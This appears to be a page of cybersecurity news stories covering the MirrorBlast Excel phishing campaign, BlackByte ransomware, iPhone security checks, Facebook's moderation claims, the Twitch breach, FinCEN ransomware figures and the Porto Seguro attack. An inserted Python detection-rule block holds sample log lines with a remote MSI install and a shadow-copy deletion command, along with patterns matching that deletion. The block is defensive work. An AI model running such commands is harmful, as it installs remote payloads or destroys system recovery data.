More stories


    This new phishing attack features a weaponized Excel file

    A new phishing campaign is targeting employees in financial services using links that download what is described as a ‘weaponized’ Excel document. The phishing campaign, dubbed MirrorBlast, was detected by security firm ET Labs in early September. Fellow security firm Morphisec has now analyzed the malware and notes the malicious Excel files could bypass malware-detection systems because they contain “extremely lightweight” embedded macros, making them “particularly dangerous” for organizations that depend on detection-based security and sandboxing.


    Macros, scripts for automating tasks, have become a popular tool for cyberattackers. While macros are disabled in Excel by default, attackers use social engineering to trick potential victims into enabling macros. Though seemingly a basic technique, macros have been used by state-sponsored hackers because they often work. Microsoft earlier this year expanded its Antimalware Scan Interface (AMSI) for antivirus to address the surge in macro malware and a new trend by attackers to use legacy Excel 4.0 XLM macros (instead of newer VBA macros) to bypass anti-malware systems.

    According to Morphisec, the attack chain in MirrorBlast resembles techniques used by a well-established, financially motivated Russia-based cybercriminal group that’s tracked by researchers as TA505. The group has been active since at least 2014 and is known for the wide variety of tools they use. “TA505 is most known for frequently changing the malware they use as well as driving global trends in malware distribution,” Morphisec researcher Arnold Osipov notes in a blogpost.

    While the MirrorBlast attack starts with a document attached to an email, it later uses a Google feedproxy URL with a SharePoint and OneDrive lure that poses as a file share request. Clicking the URL leads to a compromised SharePoint site or fake OneDrive site. Both versions lead to the weaponized Excel document.  The sample MirrorBlast email shows the attackers are exploiting the theme of company-issued information about COVID-related changes to working arrangements. 

    Morphisec notes that the macro code can be executed only on a 32-bit version of Office due to compatibility reasons with ActiveX objects. The macro itself executes a JavaScript script designed to bypass sandboxing by checking if the computer is run in administrator mode. It then launches the msiexec.exe process, which downloads and installs an MSI package. Morphisec found two variants of the MSI installer that used legitimate scripting tools called KiXtart and REBOL. The KiXtart script sends the victim’s machine information to the attacker’s command and control server, such as the domain, computer name, user name, and process list. The server then responds with a number instructing whether to proceed with the Rebol variant. According to Morphisec, the Rebol script leads to a remote access tool called FlawedGrace, which has been used by the group in the past.

    “TA505 is one of many financially motivated threat groups currently active in the marketplace. They are also one of the most creative, as they have a tendency to constantly shift the attacks they leverage to achieve their goals,” Osipov notes.


    BlackByte ransomware decryptor released

    A new form of malware found in a recent IT incident appears to have been inspired by other strains known to reap huge financial rewards for their operators — but is likely the work of amateurs.


    Dubbed BlackByte and discovered by Trustwave, the Windows-based ransomware is considered “odd” due to some of the design and function decisions made by its creators. In a set of technical advisories published last week (1,2), the cybersecurity firm says the malware only targets systems that are not based on Russian or ex-USSR languages — a common trend in ransomware believed to be of Russian origin.

    BlackByte has also taken advantage of what has become known as double-extortion in this space: not only does the malware encrypt and lock up systems, but victims are also then faced with the threat of confidential information being leaked or sold online. Modern ransomware operators, including Maze, REvil, Conti, and Babuk, run leak websites on the Dark Web for this purpose. BlackByte, too, has launched a website, but according to the researchers, the threat of data exfiltration and leaks is groundless — as the ransomware does not appear to have this functionality in the first place. As a result, more victims may pay up after infection, even if there is no actual risk of information becoming public.

    BlackByte’s encryption process also reveals that unskilled threat actors may be at work. The malware downloads and executes the same key to encrypt files in AES, rather than unique keys for each session, such as those usually employed by sophisticated ransomware operators.

    If the key cannot be downloaded from its HTTP server — hidden in a file called forest.PNG — the ransomware program simply crashes. An RSA key is used once to encrypt the ‘raw’ key to show a ransom note. “To decrypt a file, one only needs the raw key to be downloaded from the host,” Trustwave says. “As long as the .PNG file it downloaded remains the same, we can use the same key to decrypt the encrypted files.”

    Aside from this odd encryption process, the malware utilizes a JavaScript launcher designed to decrypt the main .NET DLL payload. The ransomware is executed into memory, and a victim ID is assigned using the vulnerable PC’s processor ID and volume serial number, which are then hashed and pinged to the malware’s command-and-control (C2) server. Any process which could prevent file encryption is terminated, and the SetThreadExecutionState API is used to stop the machine from entering a sleep state. In addition, volume shadow copies are wiped, Windows restore points are deleted, and network discovery is enabled. BlackByte also has worm-like capabilities similar to those employed by Ryuk, and it will try to propagate itself across available networks.

    Trustwave has made a BlackByte decryptor available for download at GitHub.
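    As an added example (not code from the original articles, nor from Morphisec or Trustwave), here are detection rules in Python for two process-creation patterns the stories above describe: msiexec.exe launched from Excel to fetch a remote MSI (the MirrorBlast chain) and volume shadow copies being wiped before encryption (BlackByte). The key="value" log format and the host names and URLs are constructed for the example, and the vssadmin/wmic command lines are an assumption, since the BlackByte article does not say how the shadow copies are deleted.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Office applications whose macro would be the parent of a downloader process.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
REMOTE_URI = re.compile(r"https?://", re.IGNORECASE)
# Assumption: the article does not say how BlackByte wipes shadow copies; these
# are the usual command lines ransomware uses for that step.
SHADOW_DELETE = (
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.IGNORECASE),
    re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.IGNORECASE),
)


@dataclass
class ProcEvent:
    host: str
    parent: str   # base name of the parent image, lower-cased
    image: str    # base name of the new process image, lower-cased
    cmdline: str


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def parse_event(line: str) -> ProcEvent:
    """Parse one constructed key="value" process-creation record."""
    fields = dict(re.findall(r'(\w+)="([^"]*)"', line))
    return ProcEvent(fields["host"], _basename(fields["parent"]),
                     _basename(fields["image"]), fields["cmdline"])


def rule_office_msiexec(ev: ProcEvent) -> Optional[str]:
    """MirrorBlast chain: Office macro -> msiexec.exe fetching a remote MSI."""
    if (ev.parent in OFFICE_PARENTS and ev.image == "msiexec.exe"
            and REMOTE_URI.search(ev.cmdline)):
        return "office_spawned_msiexec_remote_msi"
    return None


def rule_shadow_copy_delete(ev: ProcEvent) -> Optional[str]:
    """BlackByte pre-encryption step: volume shadow copies wiped."""
    if any(p.search(ev.cmdline) for p in SHADOW_DELETE):
        return "shadow_copy_deletion"
    return None


RULES = (rule_office_msiexec, rule_shadow_copy_delete)


def detect(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (host, rule_name) for every record that trips a rule."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        hits.extend((ev.host, name) for name in (r(ev) for r in RULES) if name)
    return hits


# Constructed sample records (not real telemetry); hosts and URLs are made up.
SAMPLE_LOG = [
    r'host="WS01" parent="C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE" '
    r'image="C:\Windows\SysWOW64\msiexec.exe" cmdline="msiexec.exe /i http://package.invalid/up.msi /q"',
    r'host="WS02" parent="C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" '
    r'image="C:\Windows\System32\msiexec.exe" cmdline="msiexec.exe /i C:\Installers\addin.msi /q"',
    r'host="WS03" parent="C:\Windows\System32\services.exe" '
    r'image="C:\Windows\System32\msiexec.exe" cmdline="msiexec.exe /i https://updates.invalid/agent.msi /qn"',
    r'host="WS07" parent="C:\Windows\System32\cmd.exe" '
    r'image="C:\Windows\System32\vssadmin.exe" cmdline="vssadmin.exe delete shadows /all /quiet"',
]

if __name__ == "__main__":
    for host, rule in detect(SAMPLE_LOG):
        print(f"{host}: {rule}")
```

    The local-MSI install from Excel (WS02) and the service-driven remote install (WS03) deliberately stay silent, so the first rule keys on the parent-child pair plus a remote URL rather than on msiexec.exe alone.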


    Does someone else secretly have access to your iPhone or iPad?

    The other day I downloaded a new version of the iPhone and iPad security app iVerify, and it offered a new tip for securing your device that I’d not considered before. It involves Face ID and the fact that it can have more than just your face enrolled.

    Face ID offers a super-fast and convenient way to unlock modern iPhones and iPads, and it’s super secure. But it’s only as secure as your passcode. If someone secretly knows your passcode (maybe they’ve shoulder-surfed you to get it), they could add their face to your iPhone or iPad and could be unlocking your device with the same ease that you’re unlocking it.

    OK, so how do you tell if someone else’s face is enrolled with your Face ID? Tap Settings > Face ID & Passcode and enter your passcode.

    If you see the option to Set Up an Alternative Appearance, then there’s only one face enrolled, and you’re OK.

    Image: Only one face enrolled in Face ID

    However, if that option is not visible, there are two faces enrolled (or perhaps you enrolled your face twice). If this is the case, and you’ve not set up your device so someone else can access it, tap on Reset Face ID and go through the enrollment process again (it takes seconds).

    Image: Two faces enrolled in Face ID

    I also recommend — highly recommend — that you change your passcode. To do this tap Settings > Face ID & Passcode, enter your passcode, and then tap Change Passcode.

    It’s quick to check and quick to fix. As to whose face was set up as the alternative appearance, there’s no way to know (unless you go pointing your locked iPhone at people and see if it unlocks) because the face isn’t stored, only a digital representation, and this is locked away in Apple’s Secure Enclave chip.

    I recommend installing iVerify. It’s a very handy security app that’s packed with information on how to make your iPhone or iPad more secure.



    Facebook hits back at claims its AI has minimal success in fighting hate speech

    Image: Facebook
    Facebook integrity VP Guy Rosen has shut down claims that the AI technology it uses to fight hate speech is having little impact, saying it’s “not true”. Instead, he claimed the prevalence of hate speech on Facebook has been down by almost 50% in the last three quarters.

    “We don’t want to see hate on our platform, nor do our users or advertisers, and we are transparent about our work to remove it,” Rosen wrote in a blog post. “What these documents demonstrate is that our integrity work is a multi-year journey. While we will never be perfect, our teams continually work to develop our systems, identify issues and build solutions.”

    Rosen’s post was in response to a Wall Street Journal article that reported, based on leaked internal documents, the social media giant’s AI technology created to remove offensive content such as hate speech and violent images has had little success. The report pointed out that a team of Facebook employees in March estimated the AI systems were removing posts that generated 3% to 5% of the views of hate speech on the platform, and 0.6% of all content that violated the company’s policies against violence and incitement.

    However, Rosen said “focusing just on content removals is the wrong way to look at how we fight hate speech”. “That’s because using technology to remove hate speech is only one way we counter it. We need to be confident that something is hate speech before we remove it,” he said.

    “If something might be hate speech but we’re not confident enough that it meets the bar for removal, our technology may reduce the content’s distribution or won’t recommend Groups, Pages, or people that regularly post content that is likely to violate our policies. We also use technology to flag content for more review.”

    Instead, he outlined that Facebook measures its success based on the prevalence of the hate speech people see on its platform, declaring that it’s only five views per every 10,000 on its platform. “Prevalence tells us what violating content people see because we missed it. It’s how we most objectively evaluate our progress, as it provides the most complete picture,” he said.

    Rosen also took the opportunity to point out that the WSJ report “misconstrued” its proactive detection rate, another metric the company says it uses to tell how good its technology is at finding offensive content before people report it to the company. “When we began reporting our metrics on hate speech, only 23.6% of content we removed was detected proactively by our systems; the majority of what we removed was found by people. Now, that number is over 97%,” Rosen claimed.

    Last month, Facebook said it made advancements to its AI used to help with content moderation, including introducing its Reinforcement Integrity Optimizer (RIO), which guides an AI model to learn directly from millions of current pieces of content to evaluate how well it was doing its job.

    This blog post by Rosen is the latest statement issued by Facebook as it tries to dispel scathing claims about its operations. Earlier in the month, CEO Mark Zuckerberg publicly addressed allegations that the social media giant prioritises profit over safety and wellbeing, saying that also was “just not true”. “The argument that we deliberately push content that makes people angry for profit is deeply illogical,” he said.

    The response was after Facebook whistleblower Frances Haugen fronted the US Senate as part of its inquiry into Facebook’s operations, accusing the social media giant of intentionally hiding vital information from the public for profit. During her testimony, she labelled the company as “morally bankrupt” and cast “the choices being made inside of Facebook” as “disastrous for our children, our privacy, and our democracy”.


    Check your iPhone for compromised passwords… NOW!

    Compromised passwords are a fast track to all sorts of online headaches. But thankfully iOS makes it quite easy to do a quick audit of your passwords for compromised passwords, allowing you to change them before problems escalate. And it’ll take you less than five minutes.

    Here’s how. Tap on Settings and go to Passwords. There, if you have compromised or reused passwords, you’ll see an entry called Security Recommendations.

    Image: Security Recommendations in iOS 15

    Tap on that to see the accounts that have problems with their passwords, and you’ll get the chance to either change the password on the website or service, or delete the entry (only do this if you’ve already changed the password, or it’s an old, obsolete account for a service you’ve deactivated).

    It’s quick.

    It’s simple. Most people will be done in less than five minutes. But it can save you a whole heap of headaches.

    Note: The same trick will work for the iPad. On the Mac, fire up Safari, click on Safari in the menu bar and click Preferences… then go to Passwords, and if there are any security recommendations, you will see a notice at the bottom of the window.



    Twitch says no passwords or login credentials leaked in massive breach

    Twitch has come out with a new statement denying the severity of the breach that drew headlines earlier this month. The gaming platform reiterated that the incident was caused by a “server configuration change that allowed improper access by an unauthorized third party.”

    They claimed Twitch passwords were not exposed in the breach and said they are “confident” that the systems storing Twitch login credentials, which are hashed with bcrypt, were not accessed, nor were full credit card numbers or ACH/bank information. “The exposed data primarily contained documents from Twitch’s source code repository, as well as a subset of creator payout data. We’ve undergone a thorough review of the information included in the files exposed and are confident that it only affected a small fraction of users and the customer impact is minimal. We are contacting those who have been impacted directly,” the company said.

    An unknown hacker leaked the entirety of Twitch’s source code among a 128 GB trove of data released on October 6. The data included creator payouts going back to 2019, proprietary SDKs and internal AWS services used by Twitch, as well as all of the company’s internal cybersecurity red teaming tools. While much of the press attention initially focused on the eye-popping revenues brought in by certain Twitch streamers, concern over the privacy and security of all Twitch streamers began to grow in the days following the attack.

    Experts warned that all Twitch streamers needed to take immediate actions to protect their bank accounts and themselves from a potential wave of attacks by opportunistic cybercriminals. Twitch eventually announced that it was resetting all stream keys, directing streamers to its website for new stream keys.

    The unknown hacker behind the attack claimed it was because of the platform’s lackluster response to complaints about racism, homophobia and abuse directed toward minority gamers in what are called “hate raids.” The hacker said Twitch’s community is “a disgusting toxic cesspool, so to foster more disruption and competition in the online video streaming space, we have completely pwned them, and in part one, are releasing the source code from almost 6,000 internal Git repositories.” The original note said the initial release was only the first section of the stolen data.


    $5.2 billion in BTC transactions tied to top 10 ransomware variants: US Treasury

    More than $5 billion in bitcoin transactions has been tied to the top ten ransomware variants, according to a report released by the US Treasury on Friday. The department’s Financial Crimes Enforcement Network (FinCEN) and Office of Foreign Assets Control (OFAC) released two reports illustrating just how lucrative cybercrime related to ransomware has become for the gangs behind them. Parts of the report are based on suspicious activity reports (SARs) that financial services firms filed with the US government.

    FinCEN said the total value of suspicious activity reported in ransomware-related SARs during the first six months of 2021 was $590 million, which exceeds the $416 million reported for all of 2020.

    “FinCEN analysis of ransomware-related SARs filed during the first half of 2021 indicates that ransomware is an increasing threat to the US financial sector, businesses and the public. The number of ransomware-related SARs filed monthly has grown rapidly, with 635 SARs filed and 458 transactions reported between 1 January 2021 and 30 June 2021, up 30 percent from the total of 487 SARs filed for the entire 2020 calendar year,” the report said.

    Through analyzing 177 unique convertible virtual currency wallet addresses used for ransomware-related payments associated with the 10 most commonly-reported ransomware variants in SARs during the review period, the Treasury Department found about $5.2 billion in outgoing bitcoin transactions potentially tied to ransomware payments.

    “According to data generated from ransomware-related SARs, the mean average total monthly suspicious amount of ransomware transactions was $66.4 million and the median average was $45 million. FinCEN identified bitcoin as the most common ransomware-related payment method in reported transactions,” the report adds.

    FinCEN noted that the US dollar figures are based on the value of bitcoin at the time of the transaction and added that the data set “consisted of 2,184 SARs reflecting $1.56 billion in suspicious activity filed between 1 January 2011 and 30 June 2021.”

    While the report does not say which ransomware variants made more than others, it does list the most commonly reported variants, which were REvil/Sodinokibi, Conti, DarkSide, Avaddon and Phobos. FinCEN said it found a total of 68 different ransomware variants.

    Ransomware expert and Recorded Future computer emergency response team member Allan Liska told ZDNet that Phobos being in the top five is surprising. “Phobos tends to fall under the radar and doesn’t get a lot of attention, clearly more focus needs to be placed on it so organizations can better defend themselves against it,” Liska said. He added that it was interesting to see that FinCEN has been tracking ransomware transactions since 2011, meaning they have a lot more experience tracking cryptocurrency transactions than ransomware groups realize.

    “I think we all suspected that ransomware attacks were on the rise this year, it is nice to see this confirmed,” he said. “Finally, in just the first 6 months of the year FinCEN identified 68 ransomware variants posted in SAR. Again, I don’t think most people realize just how diverse the ransomware ecosystem is.”

    The report comes one day after US officials and governments from more than 30 countries finished a two-day summit focused on ransomware and how it can be stopped. The countries pledged further cooperation and specifically mentioned the need to hold cryptocurrency platforms accountable. Coinciding with the release of the report, FinCEN released further guidance effectively threatening the virtual currency industry with penalties if they allow sanctioned people or entities to continue to use their platforms. “OFAC sanctions compliance requirements apply to the virtual currency industry in the same manner as they do to traditional financial institutions, and there are civil and criminal penalties for failing to comply,” FinCEN said on Friday.

    The FinCEN report also noted that ransomware groups are increasingly using cryptocurrencies like Monero that are popular among those seeking anonymity, and have avoided using wallets more than once. Mixing services are also widely used across the ransomware industry as a way to disrupt tracking experts, and decentralized exchanges are being used to convert ransomware payments into other cryptocurrencies. The report also mentions “chain hopping,” a practice ransomware actors use to change one coin into another at least once before moving the funds to another service or platform. “This practice allows threat actors to convert illicit BTC proceeds into an AEC like XMR at CVC exchanges or services. Threat actors can then transfer the converted funds to large CVC services and MSBs with lax compliance programs,” FinCEN said.


    Brazilian insurance giant Porto Seguro hit by cyberattack

    One of Brazil’s largest insurance groups, Porto Seguro, has reported it suffered a cyberattack that resulted in instability to its service channels and some of its systems. The company reported the incident to the Securities and Exchange Commission (CVM) on Thursday (14), saying that it “promptly activated all security protocols” and that it has been gradually restoring its operating environment and working towards resuming normal business as soon as possible.

    Porto Seguro did not disclose any further details in relation to the type of attack it has suffered, but noted that so far, no data leakage had been identified in relation to the company, or its subsidiaries, customers or partners, including any personal data.

    The third-largest insurance company in Brazil, Porto Seguro leads the car and residential insurance segments in the country and has around 10 million clients across its various business lines, including credit provision. The company is headquartered in São Paulo, with subsidiaries in Brazil and Uruguay employing more than 13,000 staff.

    The company is the latest in a list of major Brazilian organizations suffering major security incidents over recent weeks. Earlier this month, CVC, one of the country’s largest travel operators, was hit by a ransomware attack that brought its operations to a standstill. Since the attack, reported to CVM on October 2, the company has had a banner on its website stating that it has been hit by a cyberattack and that it is “working diligently to mitigate the impact of the incident and ensure business continuity.” At the time of writing, CVC’s investor relations page, where updates on the incident would have been published, was unavailable. Prior to CVC and Porto Seguro, other major companies in Brazil that were targeted by cybercriminals included retail chain Renner, victim of a ransomware attack that compromised its e-commerce platform for three days in August.

    Security teams are in place in less than a third of Brazilian organizations, even though most businesses frequently suffer cyberattacks, according to research carried out by Datafolha Institute on behalf of Mastercard and published in June. Financial services, insurance, and technology and telecommunications are among the most prepared in terms of cybersecurity readiness, the study found. Conversely, the education and healthcare sectors are the most vulnerable.

    According to a separate study, also carried out by Datafolha Institute and published in July, the fear of cyberattacks is high among Brazilian users. The research aimed at measuring the level of concern regarding the security of consumers within data and information exchange environments, and it found that only 13% of those polled consider their data to be very secure, while 21% consider their data to be insecure.

    In September, the banking sector started discussions with the Ministry of Justice around the creation of a strategy to address crime in digital environments. Goals under the strategy would include the expansion of the set-up around identifying and repressing actors responsible for cybercrimes, as well as the promotion of permanent cooperation between the public and private sectors on the matter and public awareness campaigns on cyber risks and fraud.